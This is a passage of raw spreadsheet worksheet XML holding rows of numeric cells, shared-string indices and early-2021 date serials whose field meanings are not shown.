        <v>60</v>
      </c>
      <c r="D1093" t="s">
        <v>8249</v>
      </c>
      <c r="E1093" t="s">
        <v>528</v>
      </c>
      <c r="F1093" t="s">
        <v>8250</v>
      </c>
      <c r="G1093" s="1">
        <v>44225</v>
      </c>
      <c r="H1093">
        <v>7998</v>
      </c>
      <c r="I1093">
        <v>7998</v>
      </c>
      <c r="J1093">
        <v>0</v>
      </c>
      <c r="K1093">
        <v>0</v>
      </c>
      <c r="L1093">
        <v>2</v>
      </c>
      <c r="M1093">
        <v>0</v>
      </c>
      <c r="N1093">
        <v>0</v>
      </c>
      <c r="O1093">
        <v>0</v>
      </c>
      <c r="P1093">
        <v>0</v>
      </c>
      <c r="Q1093">
        <v>4</v>
      </c>
      <c r="R1093">
        <v>4</v>
      </c>
      <c r="S1093">
        <v>0</v>
      </c>
      <c r="T1093">
        <v>1</v>
      </c>
      <c r="U1093">
        <v>0</v>
      </c>
      <c r="V1093">
        <v>0</v>
      </c>
      <c r="W1093">
        <v>150</v>
      </c>
      <c r="X1093">
        <v>0</v>
      </c>
      <c r="Y1093">
        <v>0</v>
      </c>
      <c r="Z1093">
        <v>0</v>
      </c>
      <c r="AA1093">
        <v>0</v>
      </c>
      <c r="AB1093">
        <v>50</v>
      </c>
      <c r="AC1093">
        <v>50</v>
      </c>
      <c r="AD1093">
        <v>0</v>
      </c>
      <c r="AE1093">
        <v>400</v>
      </c>
      <c r="AF1093" t="s">
        <v>8251</v>
      </c>
      <c r="AG1093">
        <v>35372</v>
      </c>
      <c r="AH1093">
        <v>10</v>
      </c>
      <c r="AJ1093">
        <v>135</v>
      </c>
      <c r="AK1093" t="s">
        <v>8252</v>
      </c>
      <c r="AL1093" t="s">
        <v>8253</v>
      </c>
      <c r="AM1093" t="s">
        <v>8254</v>
      </c>
      <c r="AN1093" t="s">
        <v>68</v>
      </c>
      <c r="AO1093">
        <v>2018</v>
      </c>
      <c r="AP1093">
        <v>81369269389</v>
      </c>
      <c r="AQ1093">
        <v>81369269389</v>
      </c>
      <c r="AR1093" t="s">
        <v>8255</v>
      </c>
      <c r="AS1093" t="s">
        <v>71</v>
      </c>
      <c r="AT1093" t="s">
        <v>72</v>
      </c>
      <c r="AU1093">
        <v>26</v>
      </c>
      <c r="AV1093">
        <v>2</v>
      </c>
      <c r="AW1093">
        <v>2</v>
      </c>
      <c r="AX1093">
        <v>6</v>
      </c>
      <c r="AY1093">
        <v>3</v>
      </c>
      <c r="AZ1093">
        <v>8</v>
      </c>
      <c r="BA1093" t="s">
        <v>17623</v>
      </c>
      <c r="BB1093">
        <v>0</v>
      </c>
      <c r="BC1093" t="s">
        <v>12808</v>
      </c>
      <c r="BD1093">
        <v>0</v>
      </c>
    </row>
    <row r="1094" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1094">
        <v>5189</v>
      </c>
      <c r="B1094" t="s">
        <v>8256</v>
      </c>
      <c r="C1094" t="s">
        <v>2848</v>
      </c>
      <c r="D1094" t="s">
        <v>8257</v>
      </c>
      <c r="E1094" t="s">
        <v>142</v>
      </c>
      <c r="F1094" t="s">
        <v>666</v>
      </c>
      <c r="G1094" s="1">
        <v>44193</v>
      </c>
      <c r="H1094">
        <v>8006</v>
      </c>
      <c r="I1094">
        <v>8006</v>
      </c>
      <c r="J1094">
        <v>1</v>
      </c>
      <c r="K1094">
        <v>0</v>
      </c>
      <c r="L1094">
        <v>0</v>
      </c>
      <c r="M1094">
        <v>0</v>
      </c>
      <c r="N1094">
        <v>0</v>
      </c>
      <c r="O1094">
        <v>0</v>
      </c>
      <c r="P1094">
        <v>0</v>
      </c>
      <c r="Q1094">
        <v>1</v>
      </c>
      <c r="R1094">
        <v>0</v>
      </c>
      <c r="S1094">
        <v>0</v>
      </c>
      <c r="T1094">
        <v>0</v>
      </c>
      <c r="U1094">
        <v>750000</v>
      </c>
      <c r="V1094">
        <v>0</v>
      </c>
      <c r="W1094">
        <v>0</v>
      </c>
      <c r="X1094">
        <v>0</v>
      </c>
      <c r="Y1094">
        <v>0</v>
      </c>
      <c r="Z1094">
        <v>0</v>
      </c>
      <c r="AA1094">
        <v>0</v>
      </c>
      <c r="AB1094">
        <v>0</v>
      </c>
      <c r="AC1094">
        <v>0</v>
      </c>
      <c r="AD1094">
        <v>0</v>
      </c>
      <c r="AE1094">
        <v>0</v>
      </c>
      <c r="AF1094" t="s">
        <v>8258</v>
      </c>
      <c r="AG1094">
        <v>30961</v>
      </c>
      <c r="AH1094">
        <v>9</v>
      </c>
      <c r="AJ1094">
        <v>99</v>
      </c>
      <c r="AK1094" t="s">
        <v>8259</v>
      </c>
      <c r="AL1094" t="s">
        <v>8260</v>
      </c>
      <c r="AM1094" t="s">
        <v>8261</v>
      </c>
      <c r="AN1094" t="s">
        <v>55</v>
      </c>
      <c r="AO1094">
        <v>2007</v>
      </c>
      <c r="AP1094" t="s">
        <v>8262</v>
      </c>
      <c r="AQ1094" t="s">
        <v>8263</v>
      </c>
      <c r="AR1094" t="s">
        <v>8258</v>
      </c>
      <c r="AS1094" t="s">
        <v>179</v>
      </c>
      <c r="AT1094" t="s">
        <v>58</v>
      </c>
      <c r="AU1094">
        <v>6</v>
      </c>
      <c r="AV1094">
        <v>1</v>
      </c>
      <c r="AW1094">
        <v>11</v>
      </c>
      <c r="AX1094">
        <v>6</v>
      </c>
      <c r="AY1094">
        <v>9</v>
      </c>
      <c r="AZ1094">
        <v>4</v>
      </c>
      <c r="BA1094" t="s">
        <v>17522</v>
      </c>
      <c r="BB1094" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1094" t="s">
        <v>12721</v>
      </c>
      <c r="BD1094">
        <v>0</v>
      </c>
    </row>
    <row r="1095" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1095">
        <v>5102</v>
      </c>
      <c r="B1095" t="s">
        <v>8264</v>
      </c>
      <c r="C1095" t="s">
        <v>129</v>
      </c>
      <c r="D1095" t="s">
        <v>8265</v>
      </c>
      <c r="E1095" t="s">
        <v>142</v>
      </c>
      <c r="F1095" t="s">
        <v>8266</v>
      </c>
      <c r="G1095" s="1">
        <v>44287</v>
      </c>
      <c r="H1095">
        <v>8027</v>
      </c>
      <c r="I1095">
        <v>8027</v>
      </c>
      <c r="J1095">
        <v>1</v>
      </c>
      <c r="K1095">
        <v>0</v>
      </c>
      <c r="L1095">
        <v>0</v>
      </c>
      <c r="M1095">
        <v>0</v>
      </c>
      <c r="N1095">
        <v>0</v>
      </c>
      <c r="O1095">
        <v>0</v>
      </c>
      <c r="P1095">
        <v>0</v>
      </c>
      <c r="Q1095">
        <v>0</v>
      </c>
      <c r="R1095">
        <v>0</v>
      </c>
      <c r="S1095">
        <v>0</v>
      </c>
      <c r="T1095">
        <v>0</v>
      </c>
      <c r="U1095">
        <v>400000</v>
      </c>
      <c r="V1095">
        <v>0</v>
      </c>
      <c r="W1095">
        <v>0</v>
      </c>
      <c r="X1095">
        <v>0</v>
      </c>
      <c r="Y1095">
        <v>0</v>
      </c>
      <c r="Z1095">
        <v>0</v>
      </c>
      <c r="AA1095">
        <v>0</v>
      </c>
      <c r="AB1095">
        <v>0</v>
      </c>
      <c r="AC1095">
        <v>0</v>
      </c>
      <c r="AD1095">
        <v>0</v>
      </c>
      <c r="AE1095">
        <v>0</v>
      </c>
      <c r="AF1095" t="s">
        <v>8267</v>
      </c>
      <c r="AG1095">
        <v>15121</v>
      </c>
      <c r="AH1095">
        <v>11</v>
      </c>
      <c r="AJ1095">
        <v>270</v>
      </c>
      <c r="AK1095" t="s">
        <v>8268</v>
      </c>
      <c r="AL1095" t="s">
        <v>8269</v>
      </c>
      <c r="AM1095" t="s">
        <v>8270</v>
      </c>
      <c r="AN1095" t="s">
        <v>55</v>
      </c>
      <c r="AO1095">
        <v>2020</v>
      </c>
      <c r="AP1095" t="s">
        <v>8271</v>
      </c>
      <c r="AQ1095" t="s">
        <v>8272</v>
      </c>
      <c r="AR1095" t="s">
        <v>8273</v>
      </c>
      <c r="AS1095" t="s">
        <v>179</v>
      </c>
      <c r="AT1095" t="s">
        <v>58</v>
      </c>
      <c r="AU1095">
        <v>22</v>
      </c>
      <c r="AV1095">
        <v>1</v>
      </c>
      <c r="AW1095">
        <v>4</v>
      </c>
      <c r="AX1095">
        <v>2</v>
      </c>
      <c r="AY1095">
        <v>4</v>
      </c>
      <c r="AZ1095">
        <v>2</v>
      </c>
      <c r="BA1095" t="s">
        <v>17583</v>
      </c>
      <c r="BB1095" t="s">
        <v>16101</v>
      </c>
      <c r="BC1095" t="s">
        <v>12825</v>
      </c>
      <c r="BD1095">
        <v>0</v>
      </c>
    </row>
    <row r="1096" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1096">
        <v>5057</v>
      </c>
      <c r="B1096" t="s">
        <v>2301</v>
      </c>
      <c r="C1096" t="s">
        <v>726</v>
      </c>
      <c r="D1096" t="s">
        <v>8274</v>
      </c>
      <c r="E1096" t="s">
        <v>300</v>
      </c>
      <c r="F1096" t="s">
        <v>8275</v>
      </c>
      <c r="G1096" s="1">
        <v>44225</v>
      </c>
      <c r="H1096">
        <v>8061</v>
      </c>
      <c r="I1096">
        <v>8061</v>
      </c>
      <c r="J1096">
        <v>2</v>
      </c>
      <c r="K1096">
        <v>1</v>
      </c>
      <c r="L1096">
        <v>2</v>
      </c>
      <c r="M1096">
        <v>0</v>
      </c>
      <c r="N1096">
        <v>0</v>
      </c>
      <c r="O1096">
        <v>0</v>
      </c>
      <c r="P1096">
        <v>0</v>
      </c>
      <c r="Q1096">
        <v>2</v>
      </c>
      <c r="R1096">
        <v>5</v>
      </c>
      <c r="S1096">
        <v>0</v>
      </c>
      <c r="T1096">
        <v>1</v>
      </c>
      <c r="U1096">
        <v>5000</v>
      </c>
      <c r="V1096">
        <v>2500</v>
      </c>
      <c r="W1096">
        <v>5000</v>
      </c>
      <c r="X1096">
        <v>0</v>
      </c>
      <c r="Y1096">
        <v>0</v>
      </c>
      <c r="Z1096">
        <v>0</v>
      </c>
      <c r="AA1096">
        <v>0</v>
      </c>
      <c r="AB1096">
        <v>50</v>
      </c>
      <c r="AC1096">
        <v>200</v>
      </c>
      <c r="AD1096">
        <v>0</v>
      </c>
      <c r="AE1096">
        <v>1000</v>
      </c>
      <c r="AF1096" t="s">
        <v>2304</v>
      </c>
      <c r="AG1096">
        <v>97791</v>
      </c>
      <c r="AH1096">
        <v>32</v>
      </c>
      <c r="AJ1096">
        <v>466</v>
      </c>
      <c r="AK1096" t="s">
        <v>8276</v>
      </c>
      <c r="AL1096" t="s">
        <v>8277</v>
      </c>
      <c r="AM1096" t="s">
        <v>8278</v>
      </c>
      <c r="AN1096" t="s">
        <v>55</v>
      </c>
      <c r="AO1096">
        <v>2020</v>
      </c>
      <c r="AP1096" t="s">
        <v>2306</v>
      </c>
      <c r="AQ1096" t="s">
        <v>8279</v>
      </c>
      <c r="AR1096" t="s">
        <v>2304</v>
      </c>
      <c r="AS1096" t="s">
        <v>71</v>
      </c>
      <c r="AT1096" t="s">
        <v>58</v>
      </c>
      <c r="AU1096">
        <v>0</v>
      </c>
      <c r="AV1096">
        <v>0</v>
      </c>
      <c r="AW1096">
        <v>0</v>
      </c>
      <c r="AX1096">
        <v>0</v>
      </c>
      <c r="AY1096">
        <v>3</v>
      </c>
      <c r="AZ1096">
        <v>2</v>
      </c>
      <c r="BA1096" t="s">
        <v>16605</v>
      </c>
      <c r="BB1096">
        <v>0</v>
      </c>
      <c r="BC1096" t="s">
        <v>9550</v>
      </c>
      <c r="BD1096" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="1097" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1097">
        <v>5171</v>
      </c>
      <c r="B1097" t="s">
        <v>8280</v>
      </c>
      <c r="C1097" t="s">
        <v>168</v>
      </c>
      <c r="D1097" t="s">
        <v>8281</v>
      </c>
      <c r="E1097" t="s">
        <v>49</v>
      </c>
      <c r="F1097" t="s">
        <v>8282</v>
      </c>
      <c r="G1097" s="1">
        <v>44294</v>
      </c>
      <c r="H1097">
        <v>8077</v>
      </c>
      <c r="I1097">
        <v>8077</v>
      </c>
      <c r="J1097">
        <v>0</v>
      </c>
      <c r="K1097">
        <v>0</v>
      </c>
      <c r="L1097">
        <v>0</v>
      </c>
      <c r="M1097">
        <v>0</v>
      </c>
      <c r="N1097">
        <v>0</v>
      </c>
      <c r="O1097">
        <v>0</v>
      </c>
      <c r="P1097">
        <v>0</v>
      </c>
      <c r="Q1097">
        <v>1</v>
      </c>
      <c r="R1097">
        <v>1</v>
      </c>
      <c r="S1097">
        <v>0</v>
      </c>
      <c r="T1097">
        <v>1</v>
      </c>
      <c r="U1097">
        <v>0</v>
      </c>
      <c r="V1097">
        <v>0</v>
      </c>
      <c r="W1097">
        <v>0</v>
      </c>
      <c r="X1097">
        <v>0</v>
      </c>
      <c r="Y1097">
        <v>0</v>
      </c>
      <c r="Z1097">
        <v>0</v>
      </c>
      <c r="AA1097">
        <v>0</v>
      </c>
      <c r="AB1097">
        <v>1000</v>
      </c>
      <c r="AC1097">
        <v>1000</v>
      </c>
      <c r="AD1097">
        <v>0</v>
      </c>
      <c r="AE1097">
        <v>1000</v>
      </c>
      <c r="AF1097" t="s">
        <v>8283</v>
      </c>
      <c r="AG1097">
        <v>16680</v>
      </c>
      <c r="AH1097">
        <v>13</v>
      </c>
      <c r="AJ1097">
        <v>161</v>
      </c>
      <c r="AK1097" t="s">
        <v>8284</v>
      </c>
      <c r="AL1097" t="s">
        <v>8285</v>
      </c>
      <c r="AM1097" t="s">
        <v>8286</v>
      </c>
      <c r="AN1097" t="s">
        <v>68</v>
      </c>
      <c r="AO1097">
        <v>2019</v>
      </c>
      <c r="AP1097">
        <v>85217717191</v>
      </c>
      <c r="AQ1097" t="s">
        <v>8287</v>
      </c>
      <c r="AR1097" t="s">
        <v>8283</v>
      </c>
      <c r="AS1097" t="s">
        <v>71</v>
      </c>
      <c r="AT1097" t="s">
        <v>72</v>
      </c>
      <c r="AU1097">
        <v>24</v>
      </c>
      <c r="AV1097">
        <v>1</v>
      </c>
      <c r="AW1097">
        <v>0</v>
      </c>
      <c r="AX1097">
        <v>0</v>
      </c>
      <c r="AY1097">
        <v>2</v>
      </c>
      <c r="AZ1097">
        <v>3</v>
      </c>
      <c r="BA1097" t="s">
        <v>17613</v>
      </c>
      <c r="BB1097">
        <v>0</v>
      </c>
      <c r="BC1097">
        <v>0</v>
      </c>
      <c r="BD1097">
        <v>0</v>
      </c>
    </row>
    <row r="1098" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1098">
        <v>5221</v>
      </c>
      <c r="B1098" t="s">
        <v>8288</v>
      </c>
      <c r="C1098" t="s">
        <v>318</v>
      </c>
      <c r="D1098" t="s">
        <v>8289</v>
      </c>
      <c r="E1098" t="s">
        <v>363</v>
      </c>
      <c r="F1098" t="s">
        <v>364</v>
      </c>
      <c r="G1098" s="1">
        <v>44251</v>
      </c>
      <c r="H1098">
        <v>8117</v>
      </c>
      <c r="I1098">
        <v>8117</v>
      </c>
      <c r="J1098">
        <v>0</v>
      </c>
      <c r="K1098">
        <v>0</v>
      </c>
      <c r="L1098">
        <v>0</v>
      </c>
      <c r="M1098">
        <v>0</v>
      </c>
      <c r="N1098">
        <v>0</v>
      </c>
      <c r="O1098">
        <v>0</v>
      </c>
      <c r="P1098">
        <v>0</v>
      </c>
      <c r="Q1098">
        <v>0</v>
      </c>
      <c r="R1098">
        <v>0</v>
      </c>
      <c r="S1098">
        <v>0</v>
      </c>
      <c r="T1098">
        <v>1</v>
      </c>
      <c r="U1098">
        <v>0</v>
      </c>
      <c r="V1098">
        <v>0</v>
      </c>
      <c r="W1098">
        <v>0</v>
      </c>
      <c r="X1098">
        <v>0</v>
      </c>
      <c r="Y1098">
        <v>0</v>
      </c>
      <c r="Z1098">
        <v>0</v>
      </c>
      <c r="AA1098">
        <v>0</v>
      </c>
      <c r="AB1098">
        <v>0</v>
      </c>
      <c r="AC1098">
        <v>0</v>
      </c>
      <c r="AD1098">
        <v>0</v>
      </c>
      <c r="AE1098">
        <v>1000000</v>
      </c>
      <c r="AF1098" t="s">
        <v>8290</v>
      </c>
      <c r="AG1098">
        <v>90245</v>
      </c>
      <c r="AH1098">
        <v>26</v>
      </c>
      <c r="AJ1098">
        <v>420</v>
      </c>
      <c r="AK1098" t="s">
        <v>936</v>
      </c>
      <c r="AL1098" t="s">
        <v>2680</v>
      </c>
      <c r="AM1098" t="s">
        <v>8291</v>
      </c>
      <c r="AN1098" t="s">
        <v>55</v>
      </c>
      <c r="AO1098">
        <v>2008</v>
      </c>
      <c r="AP1098">
        <v>81342323755</v>
      </c>
      <c r="AQ1098" t="s">
        <v>4013</v>
      </c>
      <c r="AR1098" t="s">
        <v>8292</v>
      </c>
      <c r="AS1098" t="s">
        <v>371</v>
      </c>
      <c r="AT1098" t="s">
        <v>58</v>
      </c>
      <c r="AU1098">
        <v>28</v>
      </c>
      <c r="AV1098">
        <v>0</v>
      </c>
      <c r="AW1098">
        <v>3</v>
      </c>
      <c r="AX1098">
        <v>2</v>
      </c>
      <c r="AY1098">
        <v>1</v>
      </c>
      <c r="AZ1098">
        <v>1</v>
      </c>
      <c r="BA1098" t="s">
        <v>17019</v>
      </c>
      <c r="BB1098" t="s">
        <v>17630</v>
      </c>
      <c r="BC1098">
        <v>0</v>
      </c>
      <c r="BD1098" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1099" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1099">
        <v>5137</v>
      </c>
      <c r="B1099" t="s">
        <v>8293</v>
      </c>
      <c r="C1099" t="s">
        <v>157</v>
      </c>
      <c r="D1099" t="s">
        <v>8294</v>
      </c>
      <c r="E1099" t="s">
        <v>142</v>
      </c>
      <c r="F1099" t="s">
        <v>8295</v>
      </c>
      <c r="G1099" s="1">
        <v>44243</v>
      </c>
      <c r="H1099">
        <v>8124</v>
      </c>
      <c r="I1099">
        <v>8124</v>
      </c>
      <c r="J1099">
        <v>0</v>
      </c>
      <c r="K1099">
        <v>1</v>
      </c>
      <c r="L1099">
        <v>2</v>
      </c>
      <c r="M1099">
        <v>0</v>
      </c>
      <c r="N1099">
        <v>0</v>
      </c>
      <c r="O1099">
        <v>0</v>
      </c>
      <c r="P1099">
        <v>0</v>
      </c>
      <c r="Q1099">
        <v>0</v>
      </c>
      <c r="R1099">
        <v>4</v>
      </c>
      <c r="S1099">
        <v>0</v>
      </c>
      <c r="T1099">
        <v>1</v>
      </c>
      <c r="U1099">
        <v>0</v>
      </c>
      <c r="V1099">
        <v>3000</v>
      </c>
      <c r="W1099">
        <v>10</v>
      </c>
      <c r="X1099">
        <v>0</v>
      </c>
      <c r="Y1099">
        <v>0</v>
      </c>
      <c r="Z1099">
        <v>0</v>
      </c>
      <c r="AA1099">
        <v>0</v>
      </c>
      <c r="AB1099">
        <v>0</v>
      </c>
      <c r="AC1099">
        <v>2</v>
      </c>
      <c r="AD1099">
        <v>0</v>
      </c>
      <c r="AE1099">
        <v>8</v>
      </c>
      <c r="AF1099" t="s">
        <v>8296</v>
      </c>
      <c r="AG1099">
        <v>61452</v>
      </c>
      <c r="AH1099">
        <v>16</v>
      </c>
      <c r="AJ1099">
        <v>244</v>
      </c>
      <c r="AK1099" t="s">
        <v>8297</v>
      </c>
      <c r="AL1099" t="s">
        <v>8298</v>
      </c>
      <c r="AM1099" t="s">
        <v>8299</v>
      </c>
      <c r="AN1099" t="s">
        <v>55</v>
      </c>
      <c r="AO1099">
        <v>2019</v>
      </c>
      <c r="AP1099">
        <v>81333387308</v>
      </c>
      <c r="AQ1099">
        <v>81333387308</v>
      </c>
      <c r="AR1099" t="s">
        <v>2538</v>
      </c>
      <c r="AS1099" t="s">
        <v>71</v>
      </c>
      <c r="AT1099" t="s">
        <v>58</v>
      </c>
      <c r="AU1099">
        <v>20</v>
      </c>
      <c r="AV1099">
        <v>2</v>
      </c>
      <c r="AW1099">
        <v>36</v>
      </c>
      <c r="AX1099">
        <v>63</v>
      </c>
      <c r="AY1099">
        <v>7</v>
      </c>
      <c r="AZ1099">
        <v>3</v>
      </c>
      <c r="BA1099" t="s">
        <v>17603</v>
      </c>
      <c r="BB1099">
        <v>0</v>
      </c>
      <c r="BC1099" t="s">
        <v>12765</v>
      </c>
      <c r="BD1099">
        <v>0</v>
      </c>
    </row>
    <row r="1100" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1100">
        <v>5140</v>
      </c>
      <c r="B1100" t="s">
        <v>6132</v>
      </c>
      <c r="C1100" t="s">
        <v>99</v>
      </c>
      <c r="D1100" t="s">
        <v>8300</v>
      </c>
      <c r="E1100" t="s">
        <v>142</v>
      </c>
      <c r="F1100" t="s">
        <v>8301</v>
      </c>
      <c r="G1100" s="1">
        <v>44274</v>
      </c>
      <c r="H1100">
        <v>8158</v>
      </c>
      <c r="I1100">
        <v>8158</v>
      </c>
      <c r="J1100">
        <v>1</v>
      </c>
      <c r="K1100">
        <v>0</v>
      </c>
      <c r="L1100">
        <v>1</v>
      </c>
      <c r="M1100">
        <v>0</v>
      </c>
      <c r="N1100">
        <v>0</v>
      </c>
      <c r="O1100">
        <v>0</v>
      </c>
      <c r="P1100">
        <v>0</v>
      </c>
      <c r="Q1100">
        <v>0</v>
      </c>
      <c r="R1100">
        <v>0</v>
      </c>
      <c r="S1100">
        <v>0</v>
      </c>
      <c r="T1100">
        <v>0</v>
      </c>
      <c r="U1100">
        <v>350000</v>
      </c>
      <c r="V1100">
        <v>0</v>
      </c>
      <c r="W1100">
        <v>10000</v>
      </c>
      <c r="X1100">
        <v>0</v>
      </c>
      <c r="Y1100">
        <v>0</v>
      </c>
      <c r="Z1100">
        <v>0</v>
      </c>
      <c r="AA1100">
        <v>0</v>
      </c>
      <c r="AB1100">
        <v>0</v>
      </c>
      <c r="AC1100">
        <v>0</v>
      </c>
      <c r="AD1100">
        <v>0</v>
      </c>
      <c r="AE1100">
        <v>0</v>
      </c>
      <c r="AF1100" t="s">
        <v>8302</v>
      </c>
      <c r="AG1100">
        <v>14440</v>
      </c>
      <c r="AH1100">
        <v>12</v>
      </c>
      <c r="AJ1100">
        <v>160</v>
      </c>
      <c r="AK1100" t="s">
        <v>114</v>
      </c>
      <c r="AL1100" t="s">
        <v>114</v>
      </c>
      <c r="AM1100" t="s">
        <v>8303</v>
      </c>
      <c r="AN1100" t="s">
        <v>55</v>
      </c>
      <c r="AO1100">
        <v>2015</v>
      </c>
      <c r="AP1100" t="s">
        <v>6137</v>
      </c>
      <c r="AQ1100" t="s">
        <v>1577</v>
      </c>
      <c r="AR1100" t="s">
        <v>8302</v>
      </c>
      <c r="AS1100" t="s">
        <v>179</v>
      </c>
      <c r="AT1100" t="s">
        <v>58</v>
      </c>
      <c r="AU1100">
        <v>26</v>
      </c>
      <c r="AV1100">
        <v>0</v>
      </c>
      <c r="AW1100">
        <v>0</v>
      </c>
      <c r="AX1100">
        <v>0</v>
      </c>
      <c r="AY1100">
        <v>7</v>
      </c>
      <c r="AZ1100">
        <v>2</v>
      </c>
      <c r="BA1100" t="s">
        <v>17100</v>
      </c>
      <c r="BB1100">
        <v>0</v>
      </c>
      <c r="BC1100" t="s">
        <v>10031</v>
      </c>
      <c r="BD1100">
        <v>0</v>
      </c>
    </row>
    <row r="1101" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1101">
        <v>5222</v>
      </c>
      <c r="B1101" t="s">
        <v>8304</v>
      </c>
      <c r="C1101" t="s">
        <v>3013</v>
      </c>
      <c r="D1101" t="s">
        <v>8305</v>
      </c>
      <c r="E1101" t="s">
        <v>843</v>
      </c>
      <c r="F1101" t="s">
        <v>8306</v>
      </c>
      <c r="G1101" s="1">
        <v>44207</v>
      </c>
      <c r="H1101">
        <v>8175</v>
      </c>
      <c r="I1101">
        <v>8175</v>
      </c>
      <c r="J1101">
        <v>0</v>
      </c>
      <c r="K1101">
        <v>1</v>
      </c>
      <c r="L1101">
        <v>0</v>
      </c>
      <c r="M1101">
        <v>0</v>
      </c>
      <c r="N1101">
        <v>0</v>
      </c>
      <c r="O1101">
        <v>0</v>
      </c>
      <c r="P1101">
        <v>0</v>
      </c>
      <c r="Q1101">
        <v>5</v>
      </c>
      <c r="R1101">
        <v>10</v>
      </c>
      <c r="S1101">
        <v>0</v>
      </c>
      <c r="T1101">
        <v>0</v>
      </c>
      <c r="U1101">
        <v>0</v>
      </c>
      <c r="V1101">
        <v>5000</v>
      </c>
      <c r="W1101">
        <v>0</v>
      </c>
      <c r="X1101">
        <v>0</v>
      </c>
      <c r="Y1101">
        <v>0</v>
      </c>
      <c r="Z1101">
        <v>0</v>
      </c>
      <c r="AA1101">
        <v>0</v>
      </c>
      <c r="AB1101">
        <v>200</v>
      </c>
      <c r="AC1101">
        <v>2500</v>
      </c>
      <c r="AD1101">
        <v>0</v>
      </c>
      <c r="AE1101">
        <v>0</v>
      </c>
      <c r="AF1101" t="s">
        <v>8307</v>
      </c>
      <c r="AG1101">
        <v>28763</v>
      </c>
      <c r="AH1101">
        <v>4</v>
      </c>
      <c r="AJ1101">
        <v>83</v>
      </c>
      <c r="AK1101" t="s">
        <v>2700</v>
      </c>
      <c r="AL1101" t="s">
        <v>8308</v>
      </c>
      <c r="AM1101" t="s">
        <v>8309</v>
      </c>
      <c r="AN1101" t="s">
        <v>55</v>
      </c>
      <c r="AO1101">
        <v>2016</v>
      </c>
      <c r="AP1101">
        <v>85319907064</v>
      </c>
      <c r="AQ1101">
        <v>85319907064</v>
      </c>
      <c r="AR1101" t="s">
        <v>8310</v>
      </c>
      <c r="AS1101" t="s">
        <v>71</v>
      </c>
      <c r="AT1101" t="s">
        <v>58</v>
      </c>
      <c r="AU1101">
        <v>25</v>
      </c>
      <c r="AV1101">
        <v>25</v>
      </c>
      <c r="AW1101">
        <v>2</v>
      </c>
      <c r="AX1101">
        <v>2</v>
      </c>
      <c r="AY1101">
        <v>3</v>
      </c>
      <c r="AZ1101">
        <v>1</v>
      </c>
      <c r="BA1101" t="s">
        <v>17626</v>
      </c>
      <c r="BB1101" t="s">
        <v>16113</v>
      </c>
      <c r="BC1101">
        <v>0</v>
      </c>
      <c r="BD1101" t="s">
        <v>10382</v>
      </c>
    </row>
    <row r="1102" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1102">
        <v>5204</v>
      </c>
      <c r="B1102" t="s">
        <v>8311</v>
      </c>
      <c r="C1102" t="s">
        <v>318</v>
      </c>
      <c r="D1102" t="s">
        <v>8312</v>
      </c>
      <c r="E1102" t="s">
        <v>843</v>
      </c>
      <c r="F1102" t="s">
        <v>8313</v>
      </c>
      <c r="G1102" s="1">
        <v>44237</v>
      </c>
      <c r="H1102">
        <v>8221</v>
      </c>
      <c r="I1102">
        <v>8221</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t="s">
        <v>8314</v>
      </c>
      <c r="AG1102">
        <v>90552</v>
      </c>
      <c r="AH1102">
        <v>26</v>
      </c>
      <c r="AJ1102">
        <v>406</v>
      </c>
      <c r="AK1102" t="s">
        <v>647</v>
      </c>
      <c r="AL1102" t="s">
        <v>8315</v>
      </c>
      <c r="AM1102" t="s">
        <v>8316</v>
      </c>
      <c r="AN1102" t="s">
        <v>55</v>
      </c>
      <c r="AO1102">
        <v>2020</v>
      </c>
      <c r="AP1102">
        <v>85394159634</v>
      </c>
      <c r="AQ1102" t="s">
        <v>8317</v>
      </c>
      <c r="AR1102" t="s">
        <v>8314</v>
      </c>
      <c r="AS1102" t="s">
        <v>71</v>
      </c>
      <c r="AT1102" t="s">
        <v>58</v>
      </c>
      <c r="AU1102">
        <v>20</v>
      </c>
      <c r="AV1102">
        <v>0</v>
      </c>
      <c r="AW1102">
        <v>0</v>
      </c>
      <c r="AX1102">
        <v>0</v>
      </c>
      <c r="AY1102">
        <v>9</v>
      </c>
      <c r="AZ1102">
        <v>2</v>
      </c>
      <c r="BA1102" t="s">
        <v>17624</v>
      </c>
      <c r="BB1102" t="s">
        <v>16114</v>
      </c>
      <c r="BC1102">
        <v>0</v>
      </c>
      <c r="BD1102" t="s">
        <v>11974</v>
      </c>
    </row>
    <row r="1103" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1103">
        <v>5238</v>
      </c>
      <c r="B1103" t="s">
        <v>8318</v>
      </c>
      <c r="C1103" t="s">
        <v>318</v>
      </c>
      <c r="D1103" t="s">
        <v>8319</v>
      </c>
      <c r="E1103" t="s">
        <v>843</v>
      </c>
      <c r="F1103" t="s">
        <v>8320</v>
      </c>
      <c r="G1103" s="1">
        <v>44372</v>
      </c>
      <c r="H1103">
        <v>8270</v>
      </c>
      <c r="I1103">
        <v>8270</v>
      </c>
      <c r="J1103">
        <v>0</v>
      </c>
      <c r="K1103">
        <v>1</v>
      </c>
      <c r="L1103">
        <v>0</v>
      </c>
      <c r="M1103">
        <v>0</v>
      </c>
      <c r="N1103">
        <v>0</v>
      </c>
      <c r="O1103">
        <v>0</v>
      </c>
      <c r="P1103">
        <v>0</v>
      </c>
      <c r="Q1103">
        <v>3</v>
      </c>
      <c r="R1103">
        <v>7</v>
      </c>
      <c r="S1103">
        <v>0</v>
      </c>
      <c r="T1103">
        <v>1</v>
      </c>
      <c r="U1103">
        <v>0</v>
      </c>
      <c r="V1103">
        <v>10000</v>
      </c>
      <c r="W1103">
        <v>0</v>
      </c>
      <c r="X1103">
        <v>0</v>
      </c>
      <c r="Y1103">
        <v>0</v>
      </c>
      <c r="Z1103">
        <v>0</v>
      </c>
      <c r="AA1103">
        <v>0</v>
      </c>
      <c r="AB1103">
        <v>20</v>
      </c>
      <c r="AC1103">
        <v>100</v>
      </c>
      <c r="AD1103">
        <v>0</v>
      </c>
      <c r="AE1103">
        <v>3000</v>
      </c>
